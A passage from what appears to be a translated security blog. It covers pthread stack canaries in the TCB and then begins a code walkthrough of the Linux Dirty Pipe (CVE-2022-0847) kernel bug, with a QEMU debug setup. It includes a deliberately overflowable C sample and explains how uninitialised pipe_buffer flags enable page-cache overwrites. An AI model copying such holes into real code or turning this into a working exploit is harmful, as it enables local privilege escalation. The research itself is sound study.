  int err = ALLOCATE_STACK (iattr, &pd);

  [...]

  /* Initialize the TCB.  All initializations with zero should be
   performed in 'get_cached_stack'.  This way we avoid doing this if
   the stack freshly allocated with 'mmap'.  */

#if TLS_TCB_AT_TP
  /* Reference to the TCB itself.  */
  pd->header.self = pd;

  /* Self-reference for TLS.  */
  pd->header.tcb = pd;
#endif

  [...]
      
  /* Copy the stack guard canary.  */
#ifdef THREAD_COPY_STACK_GUARD
  THREAD_COPY_STACK_GUARD (pd);
#endif

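First, pthread_create creates the thread stack (every thread has its own stack). The stack may come from the cache (for example, reusing the stack of a terminated thread) or be freshly allocated with mmap. Interestingly, the new thread's TCB is created on this very thread stack, so the address of a child thread's TCB is no longer random from the user's point of view, and a stack overflow in the child thread can overwrite the canary in the child thread's TCB.

Note that allocate_stack, the function that allocates the child thread's stack, places the TCB (the pthread structure) at the bottom of the thread stack, that is, at the very highest addresses of the stack.

This is easy to verify. I took a pthread sample from the web, tweaked it slightly, then compiled and debugged it: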

#include <stdio.h>
#include <pthread.h>
// a simple pthread example
// compile with -lpthread

// create the function to be executed as a thread
void *thread(void *ptr)
{
    // a local char array makes the compiler emit stack canary checks
    char ch[0x20];
    // deliberately unbounded read: this is the overflow under study
    scanf("%s", ch);
    printf("%s", ch);
    return NULL;
}

int main(int argc, char **argv)
{
    // create the thread objs
    pthread_t thread1;
    // start the threads
    pthread_create(&thread1, NULL, thread, NULL);
    // wait for threads to finish
    pthread_join(thread1, NULL);
    return 0;
}

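Set a breakpoint on the thread function, run, and switch to the child thread. The thread stack and the TCB address at this point are shown below; they are very close to each other and lie in the same memory segment:

The canary was then found near the bottom of the thread stack, at an offset of 0x878 (admittedly a bit far):

Besides the thread stack allocation, there is also the THREAD_COPY_STACK_GUARD macro call further down, which copies the current thread's canary into the new thread's TCB. Keep in mind that the basic unit of control flow is the thread: although every thread has the same canary value, the check only reads the canary stored in the current thread's TCB. In other words, if a child thread's canary is altered by illegitimate means, the change does not affect the execution of other threads.

That is about all there is to the user-space canary mechanism, which turns out to be quite interesting.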

IV. References

Linux Dirty Pipe CVE-2022-0847 Vulnerability Analysis

2022-04-02T16:00:00.000Z

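I. Introduction

Dirty Pipe is a local privilege escalation vulnerability in the Linux kernel. Its impact is comparable to Dirty COW, but it is easier to exploit.

Affected range: pipe: merge anon_pipe_buf*_ops - linux commit (v5.8-rc1) ~ lib/iov_iter: initialize "flags" in new pipe_buffer (v5.17-rc6)

That is roughly 2020/5/21 to 2022/2/21.

II. Environment Setup

Follow my earlier Linux pwn environment setup notes to build a vulnerable Linux environment. The commit id used here is f6dd975583bd8ce088400648fd9819e4691c8958.

Here are a few scripts:

Layout of the key directories:
linux/busybox-1.34.1/_install: location of the busybox file system
linux/myfolder: holds the exp and other files that need to be copied into the VM

Script that boots linux: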

#! /bin/bash

# check whether we are root; elevated privileges are needed to run gef-remote --qemu-mode
user=$(env | grep "^USER" | cut -d "=" -f 2)
if [ "$user" != "root"  ]
  then
    echo "Please run this script as root"
    exit
fi

# build the POC
g++ ./myfolder/poc.c -o ./myfolder/poc -static
# copy the files into the rootfs
cp ./myfolder/* busybox-1.34.1/_install

# build the rootfs
pushd busybox-1.34.1/_install
find . | cpio -o --format=newc > ../../rootfs.img
popd

gnome-terminal -e 'gdb -x mygdbinit'

# start qemu
qemu-system-x86_64 \
    -kernel ./arch/x86/boot/bzImage \
    -initrd ./rootfs.img \
    -append "nokaslr console=ttyS0" \
    -m 2G \
    -s  \
    -S \
    -nographic

gdbinit:

set architecture i386:x86-64
add-symbol-file vmlinux
gef-remote --qemu-mode localhost:1234

# b start_kernel
c

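Starting qemu produced an error:

This was because I had forgotten to specify the memory size with -m when starting qemu. Adding -m 2G to give qemu 2G of memory fixes it.

III. Code Walkthrough

Before analyzing the vulnerability, we need to get familiar with the code involved, which is also a chance to learn how the pipe mechanism is implemented.

The following files from commit f6dd97 are involved: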

include/linux/pipe_fs_i.h
fs/pipe.c
fs/splice.c
lib/iov_iter.c
…

1. pipe-related structures

a. pipe_inode_info

The pipe_inode_info structure holds the fields the pipe mechanism needs:

/**
 *  struct pipe_inode_info - a linux kernel pipe
 *  @mutex: mutex protecting the whole thing
 *  @rd_wait: reader wait point in case of empty pipe
 *  @wr_wait: writer wait point in case of full pipe
 *  @head: The point of buffer production
 *  @tail: The point of buffer consumption
 *  @max_usage: The maximum number of slots that may be used in the ring
 *  @ring_size: total number of buffers (should be a power of 2)
 *  @tmp_page: cached released page
 *  @readers: number of current readers of this pipe
 *  @writers: number of current writers of this pipe
 *  @files: number of struct file referring this pipe (protected by ->i_lock)
 *  @r_counter: reader counter
 *  @w_counter: writer counter
 *  @fasync_readers: reader side fasync
 *  @fasync_writers: writer side fasync
 *  @bufs: the circular array of pipe buffers
 *  @user: the user who created this pipe
 **/
struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
};

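Small as it is, this structure has everything it needs, including the wait queues for readers and writers of the pipe, the size of the pipe, the array of buffers that point to the actual memory, and so on.

A pipe stores its data in a circular queue, i.e. it packs as much data as it can onto a fixed-size ring (the pipe buf ring). A few fields therefore deserve a brief explanation:

head: the index of the front of the queue. Note that the unit of this index is one pipe_buffer. head is the position that will be written next.

tail: the index of the back of the queue. tail is the position that will be read next.

The relationship between the two fields looks roughly like this: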

low addr                                 high addr
+--------------------------------------------+
|  |  |  |  |  |  |  | >|//|//|//|> |  |  |  |
+--------------------------------------------+
                       A   ---->   A
                       |           |
                     tail         head

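head always refers to the slot after the last pipe_buffer in use, much like end() in the STL; tail refers to the oldest slot that still holds unread data, and equals head when the pipe is empty.

max_usage: the maximum number of pipe_buffers that may be used; this field bounds how much data the whole pipe can hold.
ring_size: the number of pipe_buffers currently allocated. Note that this value must be a power of two.
files: the number of struct file objects that refer to this pipe (for instance, the read end and the write end of a pipe each have their own struct file).
tmp_page: caches a page that was released earlier; the page can be reused to cut reallocation cost.
bufs: the array that actually holds the pipe_buffers. By design this one-dimensional array should be viewed as a ring.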
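
To make the "array viewed as a ring" idea concrete, here is a minimal sketch of how a free-running head or tail counter can be mapped to a slot in bufs. The helper names is_power_of_two and ring_slot are hypothetical and do not exist in the kernel; the kernel code shown later simply writes the mask expression inline.

```c
#include <stdbool.h>

/* Hypothetical helper: true when n is a non-zero power of two. */
bool is_power_of_two(unsigned int n)
{
    return n != 0 && (n & (n - 1)) == 0;
}

/* Maps a free-running head/tail counter to a slot index in bufs[].
 * Assumes ring_size is a power of two, as pipe_inode_info requires,
 * so that masking is equivalent to counter % ring_size. */
unsigned int ring_slot(unsigned int counter, unsigned int ring_size)
{
    return counter & (ring_size - 1);
}
```

With a ring of 16 slots, counter values 1, 17 and 33 all land on slot 1, which is why head and tail can keep growing without ever being reset.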

b. pipe_buffer

Next, let's take a brief look at struct pipe_buffer, which describes the data actually held in the pipe:

/**
 *  struct pipe_buffer - a linux kernel pipe buffer
 *  @page: the page containing the data for the pipe buffer
 *  @offset: offset of data inside the @page
 *  @len: length of data inside the @page
 *  @ops: operations associated with this buffer. See @pipe_buf_operations.
 *  @flags: pipe buffer flags. See above.
 *  @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

This structure holds key information such as the page reference, the offset within the page, and the data length. The available flags are:

// include/linux/pipe_fs_i.h
#define PIPE_BUF_FLAG_LRU       0x01    /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC    0x02    /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT      0x04    /* page is a gift */
#define PIPE_BUF_FLAG_PACKET    0x08    /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10    /* can merge buffers */

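We can set aside the exact meaning of these flags for now.

c. iov_iter

struct iov_iter is used to iterate over data that is split across multiple pages; in other words, it walks through the pages one by one. Its definition is: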

enum iter_type {
    /* iter types */
    ITER_IOVEC = 4,
    ITER_KVEC = 8,
    ITER_BVEC = 16,
    ITER_PIPE = 32,    // the data being iterated lives in a pipe
    ITER_DISCARD = 64,
};

struct iov_iter {
    /*
     * Bit 0 is the read/write bit, set if we're writing.
     * Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
     * the caller isn't expecting to drop a page reference when done.
     */
    unsigned int type;
    size_t iov_offset;
    size_t count;
    union {
        const struct iovec *iov;
        const struct kvec *kvec;
        const struct bio_vec *bvec;
        struct pipe_inode_info *pipe;
    };
    union {
        unsigned long nr_segs;
        struct {
            unsigned int head;
            unsigned int start_head;
        };
    };
};

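The meaning of some of the fields:

type: indicates what kind of structure the data being iterated comes from, for example:
- ITER_PIPE means the data being iterated is page data inside a pipe
- ITER_DISCARD means all data written to this iov_iter is discarded.
Later memory reads and writes on the iov_iter dispatch on this type.
iov_offset: the relative offset within the page currently being iterated; reads and writes start from this offset in the page.
count: the number of bytes that can still be read or written

2. The pipe_read function

pipe_read lives in fs/pipe.c and is called whenever the kernel needs to read data from a pipe: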

const struct file_operations pipefifo_fops = {
    .open             = fifo_open,
    .llseek           = no_llseek,
    .read_iter        = pipe_read,     // read
    .write_iter       = pipe_write,    // write
    .poll             = pipe_poll,
    .unlocked_ioctl   = pipe_ioctl,
    .release          = pipe_release,
    .fasync           = pipe_fasync,
};

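Its declaration is:

static ssize_t pipe_read(struct kiocb *iocb, struct iov_iter *to)

There is no need to memorize these structures. It is enough to know that:

iocb: carries the pointer through which the current pipe structure is reached
to: where the data read from the pipe will be written, an iov_iter iterator.

Next, the kernel takes the number of bytes to read from to and the pipe_inode_info structure from iocb. If the number of bytes to read is 0, it returns immediately: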

size_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool was_full, wake_next_reader = false;
ssize_t ret;

/* Null read succeeds. */
if (unlikely(total_len == 0))
    return 0;

ret = 0;
__pipe_lock(pipe);

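Next, the kernel checks whether the pipe is full and records the result in was_full:

was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);

This flag matters little for understanding the main logic; it is mentioned here so that we can see how a pipe decides that it is full: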

/**
 * pipe_occupancy - Return number of slots used in the pipe
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 */
static inline unsigned int pipe_occupancy(unsigned int head, unsigned int tail)
{
    return head - tail;
}

/**
 * pipe_full - Return true if the pipe is full
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 * @limit: The maximum amount of slots available.
 */
static inline bool pipe_full(unsigned int head, unsigned int tail,
                 unsigned int limit)
{
    return pipe_occupancy(head, tail) >= limit;
}

As you can see, the pipe's data area is full when pipe->head - pipe->tail >= pipe->max_usage. Correspondingly, checking whether the pipe is empty is just as simple:

/**
 * pipe_empty - Return true if the pipe is empty
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 */
static inline bool pipe_empty(unsigned int head, unsigned int tail)
{
    return head == tail;
}
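
One detail worth spelling out is that head and tail are free-running unsigned counters, so head - tail stays correct even after head has wrapped past the maximum value of unsigned int. The following is a user-space sketch of the three helpers under the hypothetical names model_occupancy, model_full and model_empty; it mirrors the logic quoted above but is not kernel code.

```c
#include <stdbool.h>

/* Number of slots in use; relies on well-defined unsigned wraparound. */
unsigned int model_occupancy(unsigned int head, unsigned int tail)
{
    return head - tail;
}

/* Full when the number of used slots reaches the limit (max_usage). */
bool model_full(unsigned int head, unsigned int tail, unsigned int limit)
{
    return model_occupancy(head, tail) >= limit;
}

/* Empty when producer and consumer positions coincide. */
bool model_empty(unsigned int head, unsigned int tail)
{
    return head == tail;
}
```

For example, if tail is two below the wraparound point and head has already wrapped around to 2, the occupancy is still computed as 4.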

Back in pipe_read, the kernel then reads from the pipe in a loop:

for (;;) {
    unsigned int head = pipe->head;
    unsigned int tail = pipe->tail;
    // note that pipe->ring_size is a power of two, so ring_size-1 in binary is 0b1111...111
    unsigned int mask = pipe->ring_size - 1;
    // if the pipe contains data
    if (!pipe_empty(head, tail)) {
        // get the pipe_buffer that tail refers to; head and tail may exceed max_usage because bufs is treated as a ring
        struct pipe_buffer *buf = &pipe->bufs[tail & mask];
        // size of the data in the buf being read
        size_t chars = buf->len;
        size_t written;
        int error;
    
        // if the buf holds more than the caller asked for, truncate
        if (chars > total_len)
            chars = total_len;
        // call the pipe_buf confirm method to make sure the data in the pipe buffer is valid
        error = pipe_buf_confirm(pipe, buf);
        if (error) {
            if (!ret)
                ret = error;
            break;
        }
    
        // copy the data in the page backing the current pipe buffer into to
        written = copy_page_to_iter(buf->page, buf->offset, chars, to);
        // a short copy means an unrecoverable fault occurred while writing, so bail out
        if (unlikely(written < chars)) {
            if (!ret)
                ret = -EFAULT;
            break;
        }
        // this round is done; if bytes remain to be read, the loop will continue
        ret += chars;
        buf->offset += chars;
        buf->len -= chars;

        /* Was it a packet buffer? Clean up and exit */
        // set when the fd referring to this pipe has O_DIRECT; see pipe_write for how the flag is applied
        if (buf->flags & PIPE_BUF_FLAG_PACKET) {
            total_len = chars;
            buf->len = 0;
        }
        // if the current pipe buffer has been fully consumed, advance tail to the next pipe buffer
        if (!buf->len) {
            pipe_buf_release(pipe, buf);
            spin_lock_irq(&pipe->rd_wait.lock);
            tail++;
            pipe->tail = tail;
            spin_unlock_irq(&pipe->rd_wait.lock);
        }
        total_len -= chars;
        // if everything requested has been read, return
        if (!total_len)
            break;    /* common path: read succeeded */
        // if more data is wanted and the pipe still holds data, keep looping
        if (!pipe_empty(head, tail))    /* More to do? */
            continue;
    }

    if (!pipe->writers)
        break;
    if (ret)
        break;
    if (filp->f_flags & O_NONBLOCK) {
        ret = -EAGAIN;
        break;
    }
    __pipe_unlock(pipe);

    /*
         * We only get here if we didn't actually read anything.
         * ...
         */
    ...;
}
...;

return ret;

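3. copy_page_to_iter and friends

The comments added to pipe_read above outline the overall flow of reading a pipe. Within it, copy_page_to_iter picks a different operation depending on the type field of to:

Overall, though, its job is still to copy the given page to wherever the iov_iter points.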

// include/linux/uio.h
static __always_inline __must_check
size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    if (unlikely(!check_copy_size(addr, bytes, true)))
        return 0;
    else
        return _copy_to_iter(addr, bytes, i);
}

// lib/iov_iter.c
size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    // check that the access stays in bounds; this check normally passes
    if (unlikely(!page_copy_sane(page, offset, bytes)))
        return 0;
    if (i->type & (ITER_BVEC|ITER_KVEC)) {
        void *kaddr = kmap_atomic(page);
        size_t wanted = copy_to_iter(kaddr + offset, bytes, i);
        kunmap_atomic(kaddr);
        return wanted;
    } else if (unlikely(iov_iter_is_discard(i)))
        return bytes;
    else if (likely(!iov_iter_is_pipe(i))) 
        return copy_page_to_iter_iovec(page, offset, bytes, i);
    else // (i->type & ~(READ | WRITE)) == ITER_PIPE
        return copy_page_to_iter_pipe(page, offset, bytes, i);
}

Here we only care about how data is copied when to is itself a pipe, i.e. the copy_page_to_iter_pipe function. The whole function is quite short:

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    // the pipe to write into
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    // grab some state of the destination pipe, such as head and tail
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    size_t off;

    // sanity checks
    if (unlikely(bytes > i->count))
        bytes = i->count;

    if (unlikely(!bytes))
        return 0;

    if (!sanity(i))
        return 0;
 
    // relative offset at which to write
    off = i->iov_offset;
    // the pipe buf that will receive the data
    buf = &pipe->bufs[i_head & p_mask];
    if (off) {
        if (offset == off && buf->page == page) {
            /* merge with the last one */
            buf->len += bytes;
            i->iov_offset += bytes;
            goto out;
        }
        i_head++;
        buf = &pipe->bufs[i_head & p_mask];
    }
    // if the destination pipe is full, return immediately
    if (pipe_full(i_head, p_tail, pipe->max_usage))
        return 0;

    buf->ops = &page_cache_pipe_buf_ops;
    // bump the page's refcount
    get_page(page);
    buf->page = page;   // reference the existing page directly
    buf->offset = offset;
    buf->len = bytes;

    pipe->head = i_head + 1;
    i->iov_offset = offset + bytes;
    i->head = i_head;
out:
    i->count -= bytes;
    return bytes;
}

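The key point: when data from a new page is copied to the receiving pipe buf, the receiving pipe buf simply takes a reference to that page and records the offset and len of the copy, which avoids the cost of duplicating the data. If each copy comes from a different page, the receiving pipe's bufs hold references to different pages, and the offset and len recorded for each page may not cover the whole page.

Note: because the pipe buf references someone else's page directly, pipe_write must make sure that newly written data never lands in such a page, and that guarantee rests on the MERGE flag.

Something interesting shows up here: although most fields of the receiving pipe buf are reassigned, one field is left out, and that is the flags field!

4. copy_to_iter and friends

Besides pipe_read calling copy_page_to_iter, which in turn calls copy_page_to_iter_pipe to move data into a pipe, copy_to_iter can also be used to transfer data into a pipe: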

static __always_inline __must_check
size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    if (unlikely(!check_copy_size(addr, bytes, true)))
        return 0;
    else
        return _copy_to_iter(addr, bytes, i);
}

size_t _copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    const char *from = addr;
    if (unlikely(iov_iter_is_pipe(i))) // pipe case
        return copy_pipe_to_iter(addr, bytes, i);
    if (iter_is_iovec(i))
        might_fault();
    iterate_and_advance(i, bytes, v,
        copyout(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len),
        memcpy_to_page(v.bv_page, v.bv_offset,
                   (from += v.bv_len) - v.bv_len, v.bv_len),
        memcpy(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len)
    )

    return bytes;
}

copy_to_iter has many call sites, so there is very likely at least one that uses it to write data into a pipe. In that case control flow reaches the code that actually copies the data through copy_to_iter -> _copy_to_iter -> copy_pipe_to_iter:

static size_t copy_pipe_to_iter(const void *addr, size_t bytes,
                struct iov_iter *i)
{
    // the pipe structure
    struct pipe_inode_info *pipe = i->pipe;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head;
    size_t n, off;
    // sanity check
    if (!sanity(i))
        return 0;

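    /*  From the code we can infer what push_pipe does:
        1. work out how many bytes can be written into the pipe (it may not be large enough)
        2. prepare the pipe_bufs that will receive the data
        3. report the current head position of the pipe
        4. report the relative offset off within the current writable page
    */
    // n is the number of bytes to write
    bytes = n = push_pipe(i, bytes, &i_head, &off);
    // return immediately if nothing can be written; this branch is unlikely to be taken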
    if (unlikely(!n))
        return 0;
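    // write into the pipe until all pending data is written; each pass either fills a page to its end or finishes the data partway through a page
    do {
        // number of bytes that can be written in this pass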
        size_t chunk = min_t(size_t, n, PAGE_SIZE - off);
        memcpy_to_page(pipe->bufs[i_head & p_mask].page, off, addr, chunk);
        i->head = i_head;
        i->iov_offset = off + chunk;
        n -= chunk;
        addr += chunk;
        off = 0;
        i_head++;
    } while (n);
    // update the remaining byte count of the iov_iter
    i->count -= bytes;
    return bytes;
}

Next, let's look at push_pipe; as the annotations above suggest, it is a fairly important function:

static size_t push_pipe(struct iov_iter *i, size_t size,
            int *iter_headp, size_t *offp)
{
    // the pipe that receives the data
    struct pipe_inode_info *pipe = i->pipe;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int iter_head;
    size_t off;
    ssize_t left;
    // routine checks, not discussed here
    if (unlikely(size > i->count))
        size = i->count;
    if (unlikely(!size))
        return 0;

    left = size;
    /* data_start fetches the pipe's head and starting offset.
       It handles the cases where head refers to a pipe buf that is not yet allocated or offset == PAGE_SIZE */
    data_start(i, &iter_head, &off);
    *iter_headp = iter_head;
    *offp = off;
    // if writing starts in the middle of a page
    if (off) {
        // check whether the rest of this page is enough
        left -= PAGE_SIZE - off;
        // if it is, return right away
        if (left <= 0) {
            pipe->bufs[iter_head & p_mask].len += size;
            return size;
        }
        // otherwise first extend the partially used page to a full page
        pipe->bufs[iter_head & p_mask].len = PAGE_SIZE;
        iter_head++;
    }
    // from here on, add pages in a loop
    while (!pipe_full(iter_head, p_tail, pipe->max_usage)) {
        // take the next pipe_buffer and initialize its fields
        struct pipe_buffer *buf = &pipe->bufs[iter_head & p_mask];
        struct page *page = alloc_page(GFP_USER);
        if (!page)
            break;

        buf->ops = &default_pipe_buf_ops;
        buf->page = page;
        buf->offset = 0;
        buf->len = min_t(ssize_t, left, PAGE_SIZE);
        left -= buf->len;
        /* !!! Note that the flags field of buf is not initialized here, so it keeps whatever value the slot's previous pipe_buffer left behind */
        iter_head++;
        pipe->head = iter_head;

        if (left == 0)
            return size;
    }
    return size - left;
}

push_pipe shows that when the kernel adds pages to pipe_buffers in a loop, it does not initialize the pipe_buffer flags either! And because the pipe_buffer array is designed as a ring, a slot that is reused here keeps the flags set by its previous occupant.

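To summarize how copy_page_to_iter and copy_to_iter differ when copying data into a pipe:
The former works on a complete page, so the pipe buf only has to reference that page and record offset and len to complete the copy.
The latter makes no promise that the source sits on a complete page and instead supplies addr and len, so the pipe buf must prepare its own page to hold the data.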
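
The practical consequence of "reference" versus "copy" can be shown with a toy model. The sketch below is not kernel code: toy_ref, toy_copy, fill_by_reference and fill_by_copy are hypothetical names, and a plain char array stands in for a page.

```c
#include <string.h>

#define TOY_PAGE 8   /* toy "page" size in bytes (assumption for illustration) */

/* copy_page_to_iter style: the buffer only points at someone else's page. */
struct toy_ref {
    const char *page;
    unsigned int offset, len;
};

/* copy_to_iter style: the buffer owns a page and holds a private copy. */
struct toy_copy {
    char page[TOY_PAGE];
    unsigned int len;
};

void fill_by_reference(struct toy_ref *b, const char *page,
                       unsigned int offset, unsigned int len)
{
    b->page = page;      /* no bytes are moved */
    b->offset = offset;
    b->len = len;
}

void fill_by_copy(struct toy_copy *b, const char *addr, unsigned int len)
{
    memcpy(b->page, addr, len);   /* bytes are duplicated into the owned page */
    b->len = len;
}
```

After filling both buffers from the same source, a later change to the source is visible through the toy_ref buffer but not through the toy_copy buffer. The same sharing works in the other direction, which is why a write into a referenced page would change the page's original owner as well.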

5. The pipe_write function

This time we focus only on the two most important parts. The first is page merging:

head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
    unsigned int mask = pipe->ring_size - 1;
    struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
    int offset = buf->offset + buf->len;

    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
        offset + chars <= PAGE_SIZE) {
        ret = pipe_buf_confirm(pipe, buf);
        if (ret)
            goto out;

        ret = copy_page_from_iter(buf->page, offset, chars, from);
        if (unlikely(ret < chars)) {
            ret = -EFAULT;
            goto out;
        }

        buf->len += ret;
        if (!iov_iter_count(from))
            goto out;
    }
}

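If the pipe already holds data and the bytes to be written (the sub-page remainder, total_len modulo PAGE_SIZE) fit into the space left in the last pipe buf, they are written straight into that pipe buf and merged with its existing data. The merge requires the pipe buf to carry the PIPE_BUF_FLAG_CAN_MERGE flag, which pipe_write sets automatically as long as the fd being written does not have O_DIRECT set.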
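
The merge decision can be condensed into a small predicate. This is a user-space sketch under stated assumptions: 4 KiB pages, and hypothetical names (model_buf, merge_candidate_bytes, can_merge) that only mirror the condition in the excerpt above.

```c
#include <stdbool.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE      4096u   /* assumption: 4 KiB pages */
#define MODEL_FLAG_CAN_MERGE 0x10u   /* same value as PIPE_BUF_FLAG_CAN_MERGE */

struct model_buf {
    unsigned int offset, len, flags;
};

/* Only the part of the write that does not fill a whole page may be merged. */
size_t merge_candidate_bytes(size_t total_len)
{
    return total_len & (MODEL_PAGE_SIZE - 1);
}

/* Mirrors the condition guarding the merge path in pipe_write:
 * last is the most recently filled buffer, i.e. bufs[(head - 1) & mask]. */
bool can_merge(const struct model_buf *last, size_t total_len, bool was_empty)
{
    size_t chars = merge_candidate_bytes(total_len);

    if (chars == 0 || was_empty)
        return false;
    return (last->flags & MODEL_FLAG_CAN_MERGE) != 0 &&
           last->offset + last->len + chars <= MODEL_PAGE_SIZE;
}
```

Note that nothing in this predicate asks who owns the page behind last; the flag is the only thing standing between a write and that page.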

The second is the regular page write path:

for (;;) {
    // a pipe with no readers is broken, so raise SIGPIPE
    if (!pipe->readers) {
        send_sig(SIGPIPE, current, 0);
        if (!ret)
            ret = -EPIPE;
        break;
    }
    // try to write data into the pipe in a loop
    head = pipe->head;
    if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[head & mask];
        struct page *page = pipe->tmp_page;
        int copied;
        // pick up the tmp_page that was released earlier but kept cached;
        // if there is one, it is reused for this pipe buf and no allocation is needed
        if (!page) {
            page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
            if (unlikely(!page)) {
                ret = ret ? : -ENOMEM;
                break;
            }
            pipe->tmp_page = page;
        }

        /* Allocate a slot in the ring in advance and attach an
             * empty buffer.  If we fault or otherwise fail to use
             * it, either the reader will consume it or it'll still
             * be there for the next write.
             */
        spin_lock_irq(&pipe->rd_wait.lock);

        head = pipe->head;
        if (pipe_full(head, pipe->tail, pipe->max_usage)) {
            spin_unlock_irq(&pipe->rd_wait.lock);
            continue;
        }

        pipe->head = head + 1;
        spin_unlock_irq(&pipe->rd_wait.lock);

        /* Insert it into the buffer array */
        // fill in the new pipe buf
        buf = &pipe->bufs[head & mask];
        buf->page = page;
        buf->ops = &anon_pipe_buf_ops; // anonymous pipe operations
        buf->offset = 0;
        buf->len = 0;
        // with O_DIRECT set on the fd, every write takes a fresh page and is never merged
        if (is_packetized(filp)) 
            buf->flags = PIPE_BUF_FLAG_PACKET;
        else
            buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
        pipe->tmp_page = NULL;
        // copy the data into the page
        copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
        if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
            if (!ret)
                ret = -EFAULT;
            break;
        }
        ret += copied;
        buf->offset = 0;
        buf->len = copied;

        if (!iov_iter_count(from))
            break;
    }

    if (!pipe_full(head, pipe->tail, pipe->max_usage))
        continue;

    /* Wait for buffer space to become available. */
    if (filp->f_flags & O_NONBLOCK) {
        if (!ret)
            ret = -EAGAIN;
        break;
    }
    if (signal_pending(current)) {
        if (!ret)
            ret = -ERESTARTSYS;
        break;
    }
    ...
}

A quick word on tmp_page. If the page held by a pipe buf is referenced only by that pipe buf and is about to be released, the pipe quietly keeps the page cached for later use instead of freeing it:

static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
                  struct pipe_buffer *buf)
{
    struct page *page = buf->page;

    /*
     * If nobody else uses this page, and we don't already have a
     * temporary page, let's keep track of it as a one-deep
     * allocation cache. (Otherwise just release our reference to it)
     */
    if (page_count(page) == 1 && !pipe->tmp_page)
        pipe->tmp_page = page;
    else
        put_page(page);
}

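From the pipe read and write paths we can see that pipe bufs hold only two kinds of pages:
Pages referenced directly from elsewhere that must not be modified (for example page cache pages), so no data copy is needed
Pages the pipe allocated itself, which do require a data copy
The pipe mechanism is responsible for making sure that page data held in pipe bufs is never overwritten by the pipe itself. Note also that Merge is only allowed on pages the pipe allocated itself.

6. The do_splice function

The Linux library function splice copies data from one fd directly into another without going through user space. Its declaration is: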

#define _GNU_SOURCE         /* See feature_test_macros(7) */
#include <fcntl.h>

ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

An fd here is either a pipe fd or a file fd, so do_splice checks the type of each fd and performs a different kind of transfer accordingly.
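
For orientation, this is roughly what the file-to-pipe case looks like from user space. It is a minimal, Linux-only sketch with simplified error handling; the helper name splice_file_head is hypothetical, and the only system interfaces used are open, pipe, splice, read and close.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/* Moves up to len bytes from the start of the file at path into a fresh
 * pipe with splice(2), then reads them back out of the pipe into out.
 * Returns the number of bytes obtained, or -1 on failure. */
ssize_t splice_file_head(const char *path, char *out, size_t len)
{
    int pfd[2];
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    if (pipe(pfd) < 0) {
        close(fd);
        return -1;
    }

    loff_t off = 0;
    /* file -> pipe: fd_in is the file, fd_out is the pipe's write end */
    ssize_t n = splice(fd, &off, pfd[1], NULL, len, 0);
    if (n > 0)
        n = read(pfd[0], out, (size_t)n);

    close(pfd[0]);
    close(pfd[1]);
    close(fd);
    return n;
}
```

Between the splice call and the read, the pipe holds the file's bytes without any user-space buffer having been involved, which is the situation the rest of this section traces inside the kernel.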

Here we only care about the case where the source fd is a file and the destination fd is a pipe, i.e. data moving from a file into a pipe:

/*
 * Determine where to splice to/from.
 */
long do_splice(struct file *in, loff_t __user *off_in,
        struct file *out, loff_t __user *off_out,
        size_t len, unsigned int flags)
{
    struct pipe_inode_info *ipipe;
    struct pipe_inode_info *opipe;
    loff_t offset;
    long ret;

    ipipe = get_pipe_info(in);
    opipe = get_pipe_info(out);
    ...;
    
    // data is being copied from a file into a pipe
    if (opipe) {
        ...
        // wait until the pipe has free space
        if (out->f_flags & O_NONBLOCK)
            flags |= SPLICE_F_NONBLOCK;

        pipe_lock(opipe);
        ret = wait_for_space(opipe, flags);
        // once the pipe has free space
        if (!ret) {
            unsigned int p_space;
            // work out how much data to transfer
            /* Don't try to read more the pipe has space for. */
            p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail);
